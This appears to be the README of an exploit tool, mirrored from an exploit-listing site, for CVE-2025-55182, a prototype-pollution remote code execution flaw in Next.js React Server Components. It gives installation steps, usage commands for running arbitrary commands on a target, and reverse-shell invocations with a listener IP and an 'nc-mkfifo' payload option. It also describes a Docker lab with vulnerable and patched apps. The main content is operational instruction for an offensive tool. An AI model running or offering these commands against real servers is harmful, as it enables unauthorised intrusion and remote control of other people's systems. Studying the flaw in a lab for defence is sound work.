Share
## https://sploitus.com/exploit?id=C1801B96-B31F-56C0-A82F-E74AF7E4660E
# Next.js React Server Components RCE Exploit

Exploits CVE-2025-55182 for remote code execution via prototype pollution.

**Author:** Severian N.K.

## Description

This tool exploits a prototype pollution vulnerability in Next.js applications using React Server Components, leading to Remote Code Execution (RCE). It supports both direct command execution and reverse shells.

## Installation

This project uses a Python virtual environment to manage dependencies. First, ensure you have Python 3 installed.

1.  **Set up the virtual environment:**
    ```bash
    python3 -m venv venv
    ```

2.  **Activate the environment and install dependencies:**
    ```bash
    source venv/bin/activate
    pip install -r requirements.txt
    ```

## Usage

Make sure the virtual environment is activated (`source venv/bin/activate`) before running the exploit.

### Command Execution

To execute a single command on the target:
```bash
python3 exploit.py -u  -c ""
```

**Example:**
```bash
python3 exploit.py -u http://example.com -c "id"
```

### Reverse Shell

To get a reverse shell from the target:
```bash
python3 exploit.py -u  -r -l  -p 
```

**Example:**
```bash
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo
```


## Lab Environment

The `lab/` directory provides a Dockerized environment to safely test the exploit against a vulnerable and a patched application.

### 1. Start the Lab

```bash
cd lab
docker-compose up -d
```

This command starts two containers:
-   `react-rsc-vulnerable`: A vulnerable Next.js app on **http://localhost:3011**
-   `react-rsc-patched`: A patched Next.js app on **http://localhost:3012**

### 2. Test Command Execution

```bash
python3 exploit.py -u http://localhost:3011 -c "whoami"
```

### 3. Test Reverse Shell (Automated IP Detection)

When targeting `localhost`, the script will now **automatically detect the correct listener IP** for the Docker network. You only need to specify the port.

```bash
python3 exploit.py -u http://localhost:3011 -r -p 9001
```

This makes testing in the lab environment much simpler. The script will find the gateway IP (e.g., `172.27.0.1`) and use it for the listener automatically.

## Contributing

Contributions are welcome! If you find a bug or have an idea for an improvement, please open an issue or submit a pull request.